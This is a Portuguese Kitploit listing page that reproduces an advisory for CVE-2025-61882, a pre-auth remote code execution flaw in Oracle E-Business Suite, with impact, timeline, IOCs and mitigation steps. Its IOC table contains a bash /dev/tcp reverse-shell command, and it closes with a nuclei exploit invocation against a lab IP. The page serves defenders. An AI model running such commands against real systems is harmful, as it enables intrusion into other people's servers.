Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Blackash-CVE-2025-61882 — Fornece um advisory detalhado sobre CVE-2025-61882 com análise técnica, IOCs, consultas de detecção e um template de exploit baseado em nuclei para RCE pré-autenticação no Oracle E-Business Suite. | Kitploit
Ferramentas/GitHubGitHub/222dff-afk/blackash-cve-2025-61882
Análise de VulnerabilidadesExploraçãoSegurança WebTestes de PenetraçãoInteligência de AmeaçasResposta a Incidentes
GitHub222dff-afk/blackash-cve-2025-61882

Blackash-CVE-2025-61882

Fornece um advisory detalhado sobre CVE-2025-61882 com análise técnica, IOCs, consultas de detecção e um template de exploit baseado em nuclei para RCE pré-autenticação no Oracle E-Business Suite.

Ver Repositório
215há 0 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🛡️🚨 CVE‑2025‑61882 — Execução Remota de Código Crítica Pré‑Autenticação no Oracle E‑Business Suite (EBS) 🚨🛡️

Resumo curto: Execução remota de código crítica pré‑autenticação no Oracle E‑Business Suite (EBS) — afeta 12.2.3 → 12.2.14, CVSS 9.8, explorada ativamente na natureza (atividade de ransomware/extorsão relatada). ([oracle.com][1])


📌 Fatos rápidos (tabela)

CampoDetalhes
🆔 CVECVE‑2025‑61882
🧾 Produto / ComponenteOracle E‑Business Suite (EBS) — integração Concurrent Processing / BI Publisher
📦 Versões afetadas12.2.3 → 12.2.14
🔢 CVSS (v3.1)9.8 (AV:N/AC:L/PR:N/UI:N/C:H/I:H/A:H)
⚠️ TipoExecução Remota de Código (RCE) — nenhuma autenticação necessária
🔥 Explorada na naturezaSim — campanhas de exploração em massa / extorsão relatadas
📅 Divulgação / cronogramaOutubro de 2025 (aviso do fornecedor + writeups públicos). ([oracle.com][1])

(Acima consolidado a partir do aviso do fornecedor, NVD/CISA e múltiplas análises de fornecedores.) ([oracle.com][1])


💥 Impacto (tabela)

Área de impactoO que significa
🔓 ConfidencialidadeAtacantes podem ler dados sensíveis de RH/finanças/ERP
🛠️ IntegridadeAtacantes podem modificar registros, criar backdoors ou alterar configurações
⚡ DisponibilidadeAtacantes podem interromper serviços, executar ransomware ou destruir backups
🧭 Nível de riscoExtremo — RCE pré‑autenticação em sistema ERP crítico → possível pivô total de domínio

Referências relatando exploração de alto impacto e vínculo com ransomware. ([Rapid7][2])


🛠️ Resumo técnico (conciso)

  • Vetor: Requisições HTTP/HTTPS para endpoints web expostos do EBS disparam uma cadeia de vulnerabilidades na integração Concurrent Processing / BI Publisher levando à execução remota de código. ([oracle.com][1])
  • Complexidade: Baixa (sem autenticação, sem interação do usuário). ([nvd.nist.gov][3])
  • Payloads observados: padrões de reverse shell, web shells, scripts descartados usados para exfiltração de dados e extorsão. ([Rapid7][2])

🕵️‍♀️ Indicadores de Comprometimento (IOCs) — exemplos (tabela)

Oracle e respondedores de incidentes publicaram IOCs; abaixo estão exemplos representativos relatados em avisos e writeups de fornecedores. Procure por esses padrões em logs e endpoints. ([oracle.com][1])

TipoExemplo
🌐 IPs (observados)200.107.207.26, 185.181.60.11 (endereços de exemplo relatados)
🧾 Padrão de comandosh -c /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1 (reverse shell)
🗂️ Hashes de arquivosVários hashes SHA‑256 para scripts de exploração suspeitos (consulte o aviso do fornecedor para a lista completa)
🕳️ ArtefatosWeb shells inesperados, novos cronjobs, conexões de saída suspeitas para IPs/portas incomuns

Se você quiser a lista completa de IOCs (IPs, hashes completos, nomes de arquivos), posso colá-la aqui — diga "cole IOCs". (Sem links.)


🧭 Cronograma (compacto)

DataEvento
9 de ago de 2025Atividade de exploração no mundo real relatada mais cedo (telemetria do fornecedor). ([crowdstrike.com][4])
Início de out de 2025Oracle emitiu alerta de segurança / disponibilidade de patch para EBS. ([oracle.com][1])
6–7 de out de 2025CISA adicionou o CVE ao seu catálogo Known Exploited Vulnerabilities (KEV) (orientação para agências federais, prazo para mitigação). ([cisa.gov][5])
Out de 2025 (em andamento)Múltiplos writeups de fornecedores e relatos de exploração em massa (CrowdStrike, Rapid7, Tenable, etc.). ([crowdstrike.com][4])

✅ Ações recomendadas imediatas (tabela de etapas)

PrioridadeAçãoNotas / Especificidades de exemplo
1️⃣ CríticaAplicar patch nas instâncias EBS afetadasAplique os patches do Oracle Security Alert para as versões 12.2.3–12.2.14 imediatamente. ([oracle.com][1])
2️⃣ AltaIsolar / restringir acesso aos endpoints web do EBSBloqueie HTTP/HTTPS voltado à Internet para o EBS; permita apenas IPs de administração confiáveis ou VPN.
3️⃣ AltaHabilitar/ajustar regras de WAFImplante assinaturas de WAF de fornecedores/comunidade para os padrões de exploração; bloqueie payloads suspeitos. ([Rapid7][2])
4️⃣ AltaCaçar & detectarProcure em logs por comandos de reverse shell, gravações anormais de arquivos e conexões de saída para IOCs.
5️⃣ IncidenteConter & responder se comprometimento for encontradoIsole o host, preserve evidências forenses, altere credenciais, reconstrua a partir de backups limpos.
6️⃣ PolíticaReportar & notificarSe você estiver no escopo de requisitos regulatórios/contratuais, notifique stakeholders e autoridades conforme a política (orientação CISA/KEV pode se aplicar). ([nvd.nist.gov][3])

💀 Exploits :

┌──(kali㉿kali)-[~]
└─$ nuclei -u http://10.10.10.10:8000 -t CVE-2025-61882.yaml                                                                                                  

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io
Baixar ferramenta